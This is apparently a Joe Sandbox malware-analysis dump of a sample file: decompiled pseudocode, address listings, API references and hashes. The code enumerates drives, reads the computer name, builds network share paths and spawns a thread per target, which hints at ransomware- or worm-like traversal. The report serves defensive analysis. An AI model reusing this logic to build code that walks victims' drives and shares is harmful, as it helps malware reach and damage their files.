								E0040F730(_t450, _t379); // executed
								_t371 = _v28;
								_t482 = _t487 + 0x20;
								goto L26;
							}
						}
						_t344 = _v76;
						_t465 = _v80;
						_t458 = _v32;
						_v28 = _t344;
						_v52 = _t344;
						_v48 = _v72;
						_t346 = _v24;
						_v32 = _t465;
						_v56 = _t465;
						_v72 = _v48;
						if(_t346 <= 3) {
							_v24 = _t346 + 1;
							if(_t458 == 0) {
								L12:
								_t450 = _a4;
								_t371 = _v28;
								continue;
							}
							_t473 = _t458;
							if(_t458 == _t371) {
								L52:
								L00422587(_t458);
								_t465 = _v32;
								_t482 = _t482 + 4;
								_v80 = 0;
								_v76 = 0;
								_v72 = 0;
								goto L12;
							} else {
								goto L49;
							}
							do {
								L49:
								if( *((intOrPtr*)(_t473 + 0x14)) >= 8) {
									L00422587( *_t473);
									_t482 = _t482 + 4;
								}
								 *((intOrPtr*)(_t473 + 0x14)) = 7;
								 *(_t473 + 0x10) = 0;
								 *_t473 = 0;
								_t473 = _t473 + 0x1c;
							} while (_t473 != _t371);
							goto L52;
						}
						if(_t458 == 0) {
							L35:
							_t371 = _v28;
							break;
						}
						_t474 = _t458;
						if(_t458 == _t371) {
							L34:
							L00422587(_t458);
							_t465 = _v32;
							_t482 = _t482 + 4;
							goto L35;
						}
						do {
							if( *((intOrPtr*)(_t474 + 0x14)) >= 8) {
								L00422587( *_t474);
								_t482 = _t482 + 4;
							}
							 *((intOrPtr*)(_t474 + 0x14)) = 7;
							 *(_t474 + 0x10) = 0;
							 *_t474 = 0;
							_t474 = _t474 + 0x1c;
						} while (_t474 != _t371);
						goto L34;
					}
					_t274 = 0;
					_v8 = 2;
					_v28 = 0;
					_v56 = 0;
					_v24 = 0;
					_v52 = 0;
					_v48 = 0;
					if(_t465 == 0) {
						L43:
						_t466 = _v68;
						while(_t466 != _v64) {
							_t377 =  &(_a4[0x220]);
							_push(1);
							_push( &_v56);
							_v36 =  &(_a4[0x220]);
							if( *((intOrPtr*)(_t466 + 0x14)) < 8) {
								_t443 = _t466;
							} else {
								_t443 =  *_t466;
							}
							_t486 = _t482 - 0x18;
							_t456 = _t486;
							 *((intOrPtr*)(_t456 + 0x14)) = 7;
							 *(_t456 + 0x10) = 0;
							 *_t456 = 0;
							if( *_t443 != 0) {
								_t409 = _t443;
								_t106 = _t409 + 2; // 0x2
								_t378 = _t106;
								do {
									_t338 =  *_t409;
									_t409 = _t409 + 2;
								} while (_t338 != 0);
								_t377 = _v36;
								_t411 = _t409 - _t378 >> 1;
								goto L59;
							} else {
								_t411 = 0;
								L59:
								_push(_t411);
								E00415C10(_t377, _t456, _t456, _t466, _t443);
								E0040F730(_a4, _t377);
								_t274 = _v52;
								_t482 = _t486 + 0x20;
								_t466 = _t466 + 0x18;
								_v24 = _t274;
								_v28 = _v56;
								continue;
							}
						}
						_t451 = PeekMessageW;
						_t372 = DispatchMessageW;
						while(1) {
							L61:
							_t467 = _v28;
							while(((0x92492493 * (_t274 - _t467) >> 0x20) + _t274 - _t467 >> 4 >> 0x1f) + ((0x92492493 * (_t274 - _t467) >> 0x20) + _t274 - _t467 >> 4) != 0) {
								_v92 = 0;
								_v88 = 0;
								_v84 = 0;
								_v8 = 5;
								while(1) {
									_t319 = _v24;
									if(_t467 == _t319) {
										break;
									}
									if( *((char*)(_t467 + 0x18)) == 0) {
										_push(1);
										_push( &_v92);
										_t485 = _t482 - 0x18;
										_t407 = _t485;
										_push(0xffffffff);
										 *((intOrPtr*)(_t407 + 0x14)) = 7;
										 *(_t407 + 0x10) = 0;
										 *_t407 = 0;
										E00414690(_t372, _t407, _t467, 0);
										E0040F730(_a4,  &(_a4[0x220]));
										_t482 = _t485 + 0x20;
									}
									if(PeekMessageW( &_v132, 0, 0, 0, 1) == 0) {
										L71:
										_t467 = _t467 + 0x1c;
										continue;
									} else {
										while(_v132.message != 0x12) {
											DispatchMessageW( &_v132);
											if(PeekMessageW( &_v132, 0, 0, 0, 1) != 0) {
												continue;
											}
											goto L71;
										}
										goto L71;
									}
								}
								_t441 = _v28;
								_t406 = _t319;
								_t320 = _v88;
								_t467 = _v92;
								_v24 = _t320;
								_v52 = _t320;
								_v84 = _v48;
								_t372 = DispatchMessageW;
								_v48 = _v84;
								_t274 = _v24;
								_v32 = _t441;
								_v28 = _t467;
								_v56 = _t467;
								_v36 = _t406;
								if(_t441 == 0) {
									continue;
								}
								_t472 = _t441;
								if(_t441 == _t406) {
									L78:
									L00422587(_t441);
									_t274 = _v24;
									_t482 = _t482 + 4;
									_v92 = 0;
									_v88 = 0;
									_v84 = 0;
									goto L61;
								} else {
									goto L74;
								}
								do {
									L74:
									if( *((intOrPtr*)(_t472 + 0x14)) >= 8) {
										L00422587( *_t472);
										_t406 = _v36;
										_t482 = _t482 + 4;
									}
									 *((intOrPtr*)(_t472 + 0x14)) = 7;
									 *(_t472 + 0x10) = 0;
									 *_t472 = 0;
									_t472 = _t472 + 0x1c;
								} while (_t472 != _t406);
								_t441 = _v32;
								goto L78;
							}
							_v56 = 0;
							_v52 = 0;
							_v48 = 0;
							_v8 = 2;
							if(_t467 == 0) {
								L86:
								_t468 = _a4;
								_push(1);
								_push( &_v56);
								_t483 = _t482 - 0x18;
								_t434 = _t483;
								 *((intOrPtr*)(_t434 + 0x14)) = 7;
								 *(_t434 + 0x10) = 0;
								 *_t434 = 0;
								_t282 = 0x505ac0;
								if( *0x505ac0 != 0) {
									_t395 = 0x505ac0;
									_v36 = 0x505ac2;
									do {
										_t284 =  *_t395;
										_t395 = _t395 + 2;
									} while (_t284 != 0);
									_t282 = 0x505ac0;
									_t397 = _t395 - _v36 >> 1;
									L91:
									_push(_t397);
									E00415C10(_t372, _t434, _t451, _t468, _t282);
									E0040F730(_t468, _t468 + 0x880); // executed
									_t479 = _t483 + 0x20;
									while(1) {
										L92:
										_t469 = _v56;
										while(((0x92492493 * (_v52 - _t469) >> 0x20) + _v52 - _t469 >> 4 >> 0x1f) + ((0x92492493 * (_v52 - _t469) >> 0x20) + _v52 - _t469 >> 4) != 0) {
											_v104 = 0;
											_v100 = 0;
											_v96 = 0;
											_v8 = 7;
											while(1) {
												_t299 = _v52;
												if(_t469 == _t299) {
													break;
												}
												if( *((char*)(_t469 + 0x18)) == 0) {
													_push(1);
													_push( &_v104);
													_t484 = _t479 - 0x18;
													_t403 = _t484;
													_push(0xffffffff);
													 *((intOrPtr*)(_t403 + 0x14)) = 7;
													 *(_t403 + 0x10) = 0;
													 *_t403 = 0;
													E00414690(_t372, _t403, _t469, 0);
													E0040F730(_a4,  &(_a4[0x220])); // executed
													_t479 = _t484 + 0x20;
												}
												if(PeekMessageW( &_v132, 0, 0, 0, 1) == 0) {
													L101:
													_t469 = _t469 + 0x1c;
													continue;
												} else {
													while(_v132.message != 0x12) {
														DispatchMessageW( &_v132);
														if(PeekMessageW( &_v132, 0, 0, 0, 1) != 0) {
															continue;
														}
														goto L101;
													}
													goto L101;
												}
											}
											_t439 = _v56;
											_t402 = _t299;
											_t469 = _v104;
											_v52 = _v100;
											_v96 = _v48;
											_v8 = 2;
											_v32 = _t439;
											_v56 = _t469;
											_v36 = _t402;
											_v48 = _v96;
											if(_t439 == 0) {
												continue;
											}
											_t471 = _t439;
											if(_t439 == _t402) {
												L109:
												L00422587(_t439);
												_t479 = _t479 + 4;
												_v104 = 0;
												_v100 = 0;
												_v96 = 0;
												goto L92;
											}
											do {
												if( *((intOrPtr*)(_t471 + 0x14)) >= 8) {
													L00422587( *_t471); // executed
													_t402 = _v36;
													_t479 = _t479 + 4;
												}
												 *((intOrPtr*)(_t471 + 0x14)) = 7;
												 *(_t471 + 0x10) = 0;
												 *_t471 = 0;
												_t471 = _t471 + 0x1c;
											} while (_t471 != _t402);
											_t439 = _v32;
											goto L109;
										}
										_t292 = _a4;
										_t292[1] = 0;
										SendMessageW( *_t292, 0x8003, 0, 0);
										if(_t469 == 0) {
											L117:
											_t452 = _v68;
											if(_t452 == 0) {
												goto L124;
											}
											_t373 = _v64;
											_t470 = _t452;
											if(_t452 == _t373) {
												L122:
												_push(_t452);
												goto L123;
											} else {
												goto L119;
											}
											do {
												L119:
												if( *((intOrPtr*)(_t470 + 0x14)) >= 8) {
													L00422587( *_t470);
													_t479 = _t479 + 4;
												}
												 *((intOrPtr*)(_t470 + 0x14)) = 7;
												 *(_t470 + 0x10) = 0;
												 *_t470 = 0;
												_t470 = _t470 + 0x18;
											} while (_t470 != _t373);
											goto L122;
										}
										_t374 = _v52;
										_t453 = _v56;
										if(_v56 == _t374) {
											L116:
											L00422587(_t453);
											_t479 = _t479 + 4;
											goto L117;
										}
										do {
											if( *((intOrPtr*)(_t469 + 0x14)) >= 8) {
												L00422587( *_t469);
												_t479 = _t479 + 4;
											}
											 *((intOrPtr*)(_t469 + 0x14)) = 7;
											 *(_t469 + 0x10) = 0;
											 *_t469 = 0;
											_t469 = _t469 + 0x1c;
										} while (_t469 != _t374);
										goto L116;
									}
								}
								_t397 = 0;
								goto L91;
							}
							_t316 = _v24;
							if(_v28 == _t316) {
								L85:
								L00422587(_v28);
								_t482 = _t482 + 4;
								goto L86;
							}
							do {
								if( *((intOrPtr*)(_t467 + 0x14)) >= 8) {
									L00422587( *_t467);
									_t316 = _v24;
									_t482 = _t482 + 4;
								}
								 *((intOrPtr*)(_t467 + 0x14)) = 7;
								 *(_t467 + 0x10) = 0;
								 *_t467 = 0;
								_t467 = _t467 + 0x1c;
							} while (_t467 != _t316);
							goto L85;
						}
					}
					_t457 = _v32;
					if(_v32 == _t371) {
						L42:
						L00422587(_t457);
						_t482 = _t482 + 4;
						_t274 = 0;
						goto L43;
					}
					do {
						if( *((intOrPtr*)(_t465 + 0x14)) >= 8) {
							L00422587( *_t465);
							_t482 = _t482 + 4;
						}
						 *((intOrPtr*)(_t465 + 0x14)) = 7;
						 *(_t465 + 0x10) = 0;
						 *_t465 = 0;
						_t465 = _t465 + 0x1c;
					} while (_t465 != _t371);
					goto L42;
				}
				L4:
				L4:
				if( *((intOrPtr*)(_t464 + 0x14)) < 8) {
					_t359 = _t464;
				} else {
					_t359 =  *_t464;
				}
				_t360 = E00420235(_t370, _t449, _t464, _t359, "C:\");
				_t477 = _t477 + 8;
				if(_t360 == 0) {
					goto L10;
				}
				_t449 = _t449 + 1;
				_t464 = _t464 + 0x18;
				if(_t449 < _t370) {
					goto L4;
				}
				goto L11;
				L10:
				_t464 = _v68;
				E004137A0( &_v68,  &_v36, _v68 + (_t449 + _t449 * 2) * 8);
				goto L11;
			}

0x0041f133
0x0041f135
0x0041f140
0x0041f141
0x0041f148
0x0041f14f
0x0041f154
0x0041f157
0x0041f15a
0x0041f165
0x0041f16a
0x0041f171
0x0041f185
0x0041f187
0x0041f190
0x0041f936
0x0041f93d
0x0041f948
0x0041f948
0x0041f19d
0x0041f1a6
0x0041f1ad
0x0041f1b4
0x0041f1bb
0x0041f94e
0x0041f952
0x0041f953
0x0041f958
0x0041f95a
0x0041f95c
0x0041f963
0x0041f96b
0x0041f975
0x0041f982
0x0041f987
0x0041f98a
0x0041f990
0x0041f999
0x0041f9b2
0x0041f9b7
0x0041f9bc
0x0041f99b
0x0041f99f
0x0041f9a4
0x0041f9a9
0x0041f9a9
0x0041f999
0x0041f9cc
0x0041f9d0
0x0041f9d6
0x0041f9db
0x00000000
0x00000000
0x0041f9e5
0x0041f9ea
0x0041f92e
0x0041f92e
0x00000000
0x0041f933
0x0041f1c4
0x0041f1c8
0x0041f1d5
0x0041f1d8
0x0041f1e6
0x0041f1e8
0x0041f22e
0x0041f22e
0x0041f235
0x0041f23c
0x0041f243
0x0041f249
0x0041f24b
0x0041f24c
0x0041f24f
0x0041f253
0x0041f257
0x0041f259
0x0041f260
0x0041f26c
0x0041f26f
0x0041f27c
0x0041f281
0x0041f284
0x0041f287
0x0041f28a
0x0041f291
0x0041f294
0x0041f2a6
0x0041f2c3
0x0041f2ca
0x0041f2d1
0x0041f2d8
0x0041f2e0
0x0041f2ec
0x0041f35d
0x0041f35d
0x00000000
0x0041f35d
0x0041f2f5
0x0041f2f7
0x0041f2fd
0x0041f2fe
0x0041f301
0x0041f307
0x0041f303
0x0041f303
0x0041f303
0x0041f309
0x0041f30e
0x0041f310
0x0041f317
0x0041f31e
0x0041f324
0x0041f32a
0x0041f32c
0x0041f32c
0x0041f330
0x0041f330
0x0041f333
0x0041f336
0x0041f33d
0x0041f340
0x00000000
0x0041f326
0x0041f326
0x0041f342
0x0041f342
0x0041f346
0x0041f34b
0x0041f352
0x0041f357
0x0041f35a
0x00000000
0x0041f35a
0x0041f324
0x0041f365
0x0041f36b
0x0041f36e
0x0041f371
0x0041f374
0x0041f37a
0x0041f37d
0x0041f380
0x0041f383
0x0041f386
0x0041f38c
0x0041f466
0x0041f46b
0x0041f2a0
0x0041f2a0
0x0041f2a3
0x00000000
0x0041f2a3
0x0041f471
0x0041f475
0x0041f4a1
0x0041f4a2
0x0041f4a7
0x0041f4aa
0x0041f4ad
0x0041f4b4
0x0041f4bb
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f477
0x0041f477
0x0041f47b
0x0041f47f
0x0041f484
0x0041f484
0x0041f489
0x0041f490
0x0041f497
0x0041f49a
0x0041f49d
0x00000000
0x0041f477
0x0041f394
0x0041f3d6
0x0041f3d6
0x00000000
0x0041f3d6
0x0041f396
0x0041f39a
0x0041f3ca
0x0041f3cb
0x0041f3d0
0x0041f3d3
0x00000000
0x0041f3d3
0x0041f3a0
0x0041f3a4
0x0041f3a8
0x0041f3ad
0x0041f3ad
0x0041f3b2
0x0041f3b9
0x0041f3c0
0x0041f3c3
0x0041f3c6
0x00000000
0x0041f3a0
0x0041f3d9
0x0041f3db
0x0041f3df
0x0041f3e2
0x0041f3e5
0x0041f3e8
0x0041f3eb
0x0041f3f0
0x0041f435
0x0041f435
0x0041f440
0x0041f44f
0x0041f459
0x0041f45b
0x0041f45c
0x0041f45f
0x0041f4c7
0x0041f461
0x0041f461
0x0041f461
0x0041f4c9
0x0041f4ce
0x0041f4d0
0x0041f4d7
0x0041f4de
0x0041f4e4
0x0041f4ea
0x0041f4ec
0x0041f4ec
0x0041f4f0
0x0041f4f0
0x0041f4f3
0x0041f4f6
0x0041f4fd
0x0041f500
0x00000000
0x0041f4e6
0x0041f4e6
0x0041f502
0x0041f502
0x0041f506
0x0041f510
0x0041f515
0x0041f518
0x0041f51e
0x0041f521
0x0041f524
0x00000000
0x0041f524
0x0041f4e4
0x0041f52c
0x0041f532
0x0041f538
0x0041f538
0x0041f538
0x0041f540
0x0041f55d
0x0041f564
0x0041f56b
0x0041f572
0x0041f576
0x0041f576
0x0041f57b
0x00000000
0x00000000
0x0041f581
0x0041f583
0x0041f588
0x0041f589
0x0041f58e
0x0041f590
0x0041f593
0x0041f59a
0x0041f5a2
0x0041f5a5
0x0041f5b5
0x0041f5ba
0x0041f5ba
0x0041f5cd
0x0041f5ee
0x0041f5ee
0x00000000
0x0041f5d0
0x0041f5d0
0x0041f5da
0x0041f5ec
0x00000000
0x00000000
0x00000000
0x0041f5ec
0x00000000
0x0041f5d0
0x0041f5cd
0x0041f5f3
0x0041f5f6
0x0041f5f8
0x0041f5fe
0x0041f601
0x0041f604
0x0041f60a
0x0041f60d
0x0041f613
0x0041f616
0x0041f619
0x0041f61c
0x0041f61f
0x0041f622
0x0041f627
0x00000000
0x00000000
0x0041f62d
0x0041f631
0x0041f663
0x0041f664
0x0041f669
0x0041f66c
0x0041f66f
0x0041f676
0x0041f67d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f633
0x0041f633
0x0041f637
0x0041f63b
0x0041f640
0x0041f643
0x0041f643
0x0041f648
0x0041f64f
0x0041f656
0x0041f659
0x0041f65c
0x0041f660
0x00000000
0x0041f660
0x0041f689
0x0041f690
0x0041f697
0x0041f69e
0x0041f6a4
0x0041f6e8
0x0041f6e8
0x0041f6ee
0x0041f6f0
0x0041f6f1
0x0041f6f6
0x0041f6f8
0x0041f6ff
0x0041f706
0x0041f709
0x0041f712
0x0041f718
0x0041f71d
0x0041f720
0x0041f720
0x0041f723
0x0041f726
0x0041f72e
0x0041f733
0x0041f735
0x0041f735
0x0041f739
0x0041f746
0x0041f74b
0x0041f74e
0x0041f74e
0x0041f74e
0x0041f751
0x0041f76f
0x0041f776
0x0041f77d
0x0041f784
0x0041f788
0x0041f788
0x0041f78d
0x00000000
0x00000000
0x0041f793
0x0041f795
0x0041f79a
0x0041f79b
0x0041f7a0
0x0041f7a2
0x0041f7a5
0x0041f7ac
0x0041f7b4
0x0041f7b7
0x0041f7c7
0x0041f7cc
0x0041f7cc
0x0041f7df
0x0041f7ff
0x0041f7ff
0x00000000
0x0041f7e1
0x0041f7e1
0x0041f7eb
0x0041f7fd
0x00000000
0x00000000
0x00000000
0x0041f7fd
0x00000000
0x0041f7e1
0x0041f7df
0x0041f804
0x0041f807
0x0041f80f
0x0041f812
0x0041f818
0x0041f81b
0x0041f825
0x0041f828
0x0041f82b
0x0041f82e
0x0041f833
0x00000000
0x00000000
0x0041f839
0x0041f83d
0x0041f870
0x0041f871
0x0041f876
0x0041f879
0x0041f880
0x0041f887
0x00000000
0x0041f887
0x0041f840
0x0041f844
0x0041f848
0x0041f84d
0x0041f850
0x0041f850
0x0041f855
0x0041f85c
0x0041f863
0x0041f866
0x0041f869
0x0041f86d
0x00000000
0x0041f86d
0x0041f893
0x0041f8a1
0x0041f8a5
0x0041f8ad
0x0041f8f3
0x0041f8f3
0x0041f8f8
0x00000000
0x00000000
0x0041f8fa
0x0041f8fd
0x0041f901
0x0041f92d
0x0041f92d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f903
0x0041f903
0x0041f907
0x0041f90b
0x0041f910
0x0041f910
0x0041f915
0x0041f91c
0x0041f923
0x0041f926
0x0041f929
0x00000000
0x0041f903
0x0041f8af
0x0041f8b2
0x0041f8b7
0x0041f8ea
0x0041f8eb
0x0041f8f0
0x00000000
0x0041f8f0
0x0041f8c0
0x0041f8c4
0x0041f8c8
0x0041f8cd
0x0041f8cd
0x0041f8d2
0x0041f8d9
0x0041f8e0
0x0041f8e3
0x0041f8e6
0x00000000
0x0041f8c0
0x0041f74e
0x0041f714
0x00000000
0x0041f714
0x0041f6a6
0x0041f6ac
0x0041f6dd
0x0041f6e0
0x0041f6e5
0x00000000
0x0041f6e5
0x0041f6b0
0x0041f6b4
0x0041f6b8
0x0041f6bd
0x0041f6c0
0x0041f6c0
0x0041f6c5
0x0041f6cc
0x0041f6d3
0x0041f6d6
0x0041f6d9
0x00000000
0x0041f6b0
0x0041f538
0x0041f3f2
0x0041f3f7
0x0041f42a
0x0041f42b
0x0041f430
0x0041f433
0x00000000
0x0041f433
0x0041f400
0x0041f404
0x0041f408
0x0041f40d
0x0041f40d
0x0041f412
0x0041f419
0x0041f420
0x0041f423
0x0041f426
0x00000000
0x0041f400
0x00000000
0x0041f1f0
0x0041f1f4
0x0041f1fa
0x0041f1f6
0x0041f1f6
0x0041f1f6
0x0041f202
0x0041f207
0x0041f20c
0x00000000
0x00000000
0x0041f20e
0x0041f20f
0x0041f214
0x00000000
0x00000000
0x00000000
0x0041f218
0x0041f218
0x0041f229
0x00000000

APIs

timeGetTime.WINMM ref: 0041F15E
Sleep.KERNEL32(?), ref: 0041F185
Sleep.KERNEL32(?), ref: 0041F19D
SendMessageW.USER32(?,00008003,00000000,00000000), ref: 0041F9D0

Part of subcall function 00410A50: GetLogicalDrives.KERNEL32 ref: 00410A75
Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
Part of subcall function 00410A50: PathFileExistsA.SHLWAPI(?), ref: 00410AF9
Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000000), ref: 00410B02
Part of subcall function 00410A50: GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Strings

C:\, xrefs: 0041F1FC, 0041F267, 0041F709, 0041F72E, 0041F736

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
String ID: C:\
API String ID: 3672571082-3404278061
Opcode ID: 71eae1469a80d4dcfe2ecc6dd6c90ff33ca603433e6c1fdba8a997785e70705c
Instruction ID: 5c6d64671d491e840e8d62e2c9f1d443296aa8abdfe0033865403ad230f1735f
Opcode Fuzzy Hash: 71eae1469a80d4dcfe2ecc6dd6c90ff33ca603433e6c1fdba8a997785e70705c
Instruction Fuzzy Hash: C842B171E003059BDF24DFA8C885BDEB7B1BF44308F14452EE805AB381D779A98ACB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E0041BAE0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v40;
				char _v2308;
				char _v2312;
				intOrPtr _v2316;
				int _v2320;
				intOrPtr _v2328;
				int _v2332;
				short _v2336;
				intOrPtr _v2340;
				short _v2348;
				intOrPtr _v2352;
				int _v2356;
				short _v2372;
				char _v2376;
				int _v2384;
				int _v2388;
				intOrPtr _v2396;
				int _v2400;
				intOrPtr _v2404;
				long _v2408;
				intOrPtr _v2412;
				int _v2416;
				char _v2424;
				char _v2432;
				char _v2436;
				signed int _v2440;
				void* _v2448;
				intOrPtr _v2452;
				signed int _v2456;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t100;
				intOrPtr* _t101;
				long _t102;
				void* _t111;
				long _t117;
				void* _t125;
				void* _t128;
				void* _t136;
				intOrPtr _t140;
				long _t141;
				long _t150;
				intOrPtr* _t151;
				long _t152;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t158;
				void* _t161;
				int _t164;
				intOrPtr* _t165;
				signed int _t170;
				short* _t171;
				short* _t172;
				intOrPtr* _t176;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				DWORD* _t194;
				struct HWND__* _t195;
				struct HWND__* _t203;
				intOrPtr _t206;
				intOrPtr _t208;
				signed int _t211;
				signed int _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				short* _t218;
				short* _t219;
				void* _t221;

				_t212 = _t211 & 0xfffffff8;
				_t164 = _a8;
				_push(0xffffffff);
				_push(0x4cb187);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t212;
				_t213 = _t212 - 0x978;
				_push(_t158);
				_push(_t191);
				_t221 = _t164 - 0x8001;
				if(_t221 > 0) {
					_t100 = _t164 - 0x8003;
					__eflags = _t100;
					if(_t100 == 0) {
						_t165 =  *0x513268;
						_t101 =  *_t165;
						__eflags = _t101 - _t165;
						if(_t101 == _t165) {
							L46:
							__eflags =  *0x52923c;
							if( *0x52923c != 0) {
								goto L50;
							} else {
								goto L47;
							}
						} else {
							while(1) {
								__eflags =  *((char*)(_t101 + 0xd));
								if( *((char*)(_t101 + 0xd)) != 0) {
									break;
								}
								_t101 =  *_t101;
								__eflags = _t101 - _t165;
								if(_t101 != _t165) {
									continue;
								} else {
									goto L46;
								}
								goto L51;
							}
							L50:
							_t102 = DefWindowProcW(_a4, 0x8003, _a12, _a16);
							 *[fs:0x0] = _v16;
							return _t102;
						}
					} else {
						__eflags = _t100 == 1;
						if(_t100 == 1) {
							_v2408 = 0x400;
							_t205 = E00420C62(_t158, _t187, _t191, 0x800);
							GetComputerNameW(_t107,  &_v2408);
							_v2412 = 7;
							_v2416 = 0;
							_v2432 = 0;
							_v8 = 0;
							_t111 = E00413100( &_v2348, _t191, L"\\\\");
							_v12 = 1;
							_t194 = E0041CE80( &_v2376, _t111, _t205);
							_t215 = _t213 + 8;
							__eflags =  &_v2436 - _t194;
							if( &_v2436 != _t194) {
								__eflags = 0;
								_v2412 = 7;
								_v2416 = 0;
								_v2432 = 0;
								E004145A0( &_v2432, _t194);
							}
							__eflags = _v2352 - 8;
							if(_v2352 >= 8) {
								L00422587(_v2372);
								_t215 = _t215 + 4;
							}
							_v2352 = 7;
							_v8 = 0;
							__eflags = _v2328 - 8;
							_v2356 = 0;
							_v2372 = 0;
							if(_v2328 >= 8) {
								L00422587(_v2348);
								_t215 = _t215 + 4;
							}
							_v2328 = 7;
							_v2332 = 0;
							_v2348 = 0;
							E00420BED(_t205);
							_t206 =  *0x529240; // 0x2f934a0
							_t170 = 0;
							_t216 = _t215 + 4;
							_v2440 = 0;
							__eflags = _t206 -  *0x529244; // 0x2f935f0
							if(__eflags == 0) {
								L37:
								_t195 = _a4;
								_t208 =  *((intOrPtr*)( *0x513268));
								_t117 = IsWindow(_t195);
								__eflags = _t117;
								if(_t117 != 0) {
									__eflags =  *(_t208 + 0x8c8);
									if( *(_t208 + 0x8c8) <= 0) {
										 *0x529224 = 1;
										DestroyWindow(_t195);
									}
								}
							} else {
								_t40 = _t206 + 0x28; // 0x2f934c8
								_t161 = _t40;
								do {
									__eflags =  *((intOrPtr*)(_t161 - 0x24)) - 1;
									if( *((intOrPtr*)(_t161 - 0x24)) == 1) {
										__eflags =  *((intOrPtr*)(_t161 - 0x20)) - 3;
										if( *((intOrPtr*)(_t161 - 0x20)) == 3) {
											_t218 = _t216 - 0x18;
											_t171 = _t218;
											_v2436 = _t218;
											_push(0xffffffff);
											 *((intOrPtr*)(_t171 + 0x14)) = 7;
											 *(_t171 + 0x10) = 0;
											 *_t171 = 0;
											E00414690(_t161, _t171,  &_v2432, 0);
											_t219 = _t218 - 0x18;
											_v20 = 2;
											_t172 = _t219;
											_push(0xffffffff);
											 *((intOrPtr*)(_t172 + 0x14)) = 7;
											 *(_t172 + 0x10) = 0;
											 *_t172 = 0;
											E00414690(_t161, _t172, _t161, 0);
											_v32 = 0;
											_t125 = E0040EFF0(0);
											_t216 = _t219 + 0x30;
											__eflags = _t125 - 0xffffffff;
											if(_t125 != 0xffffffff) {
												_t170 = _v2448;
											} else {
												_v2388 = 0;
												_v2384 = 0;
												E0041C330(_t194, _t206,  &_v2388);
												_t128 = E00419D10( &_v2308);
												_v20 = 3;
												E0041C240(_t194, _t206, _t128);
												_v24 = 0;
												E0041B680( &_v2312);
												_t176 =  *0x513268;
												_t131 =  *_t176;
												_t197 =  *((intOrPtr*)(_t176 + 4)) + 8;
												_v2452 =  *((intOrPtr*)(_t176 + 4)) + 8;
												 *((intOrPtr*)(_t131 + 0x8c8)) =  *((intOrPtr*)( *_t176 + 0x8c8)) + 1;
												E0041B8B0(_t161, _t197, _t131 + 8);
												_v2404 = 7;
												_push(0xffffffff);
												_v2408 = 0;
												_v2424 = 0;
												E00414690(_t161,  &_v2424, _t161, 0);
												_v40 = 4;
												_t136 = E0041CE80( &_v2356,  &_v2436, "\\");
												_t216 = _t216 + 4;
												E004131D0(_t197 + 0x8a4, _t136);
												__eflags = _v2340 - 8;
												if(_v2340 >= 8) {
													L00422587(_v2336);
													_t216 = _t216 + 4;
												}
												_v2316 = 7;
												_v20 = 0;
												__eflags = _v2396 - 8;
												_v2320 = 0;
												_v2336 = 0;
												if(_v2396 >= 8) {
													L00422587(_v2416);
													_t216 = _t216 + 4;
												}
												_v2396 = 7;
												_v2416 = 0;
												_t140 =  *0x529228; // 0x62dab0
												_v2400 = 0;
												_t194 =  *((intOrPtr*)(_t140 + 4)) + 8;
												_t141 = CreateThread(0, 0, E0041F130, _v2448, 0, _t194);
												__eflags = _t141;
												_t194[1] = _t141;
												_t170 =  !=  ? 1 : _v2456 & 0x000000ff;
												_v2456 = _t170;
											}
										}
									}
									_t206 = _t206 + 0x70;
									_t161 = _t161 + 0x70;
									__eflags = _t206 -  *0x529244; // 0x2f935f0
								} while (__eflags != 0);
								__eflags = _t170;
								if(_t170 == 0) {
									goto L37;
								}
							}
							__eflags = _v2412 - 8;
							if(_v2412 >= 8) {
								L00422587(_v2432);
							}
							goto L49;
						} else {
							goto L15;
						}
					}
				} else {
					if(_t221 == 0) {
						_t185 =  *0x513268;
						_t151 =  *_t185;
						__eflags = _t151 - _t185;
						if(_t151 == _t185) {
							goto L49;
						} else {
							while(1) {
								__eflags =  *((char*)(_t151 + 0xd));
								if( *((char*)(_t151 + 0xd)) != 0) {
									_t152 = DefWindowProcW(_a4, 0x8001, _a12, _a16);
									 *[fs:0x0] = _v16;
									return _t152;
								}
								_t151 =  *_t151;
								__eflags = _t151 - _t185;
								if(_t151 != _t185) {
									continue;
								} else {
									goto L49;
								}
								goto L51;
							}
						}
					} else {
						_t154 = _t164 - 2;
						if(_t154 == 0) {
							PostQuitMessage(0);
							L49:
							 *[fs:0x0] = _v16;
							return 0;
						} else {
							_t155 = _t154 - 0xf;
							if(_t155 == 0) {
								goto L49;
							} else {
								_t156 = _t155 - 5;
								if(_t156 != 0) {
									L15:
									_t150 = DefWindowProcW(_a4, _t164, _a12, _a16); // executed
									 *[fs:0x0] = _v16;
									return _t150;
								} else {
									if(_a12 != _t156) {
										E00411CD0(_t158, 0, _t156);
										L47:
										_t203 = _a4;
										if(IsWindow(_t203) != 0) {
											 *0x529224 = 1;
											DestroyWindow(_t203);
										}
									}
									goto L49;
								}
							}
						}
					}
				}
				L51:
			}

APIs

PostQuitMessage.USER32(00000000), ref: 0041BB49
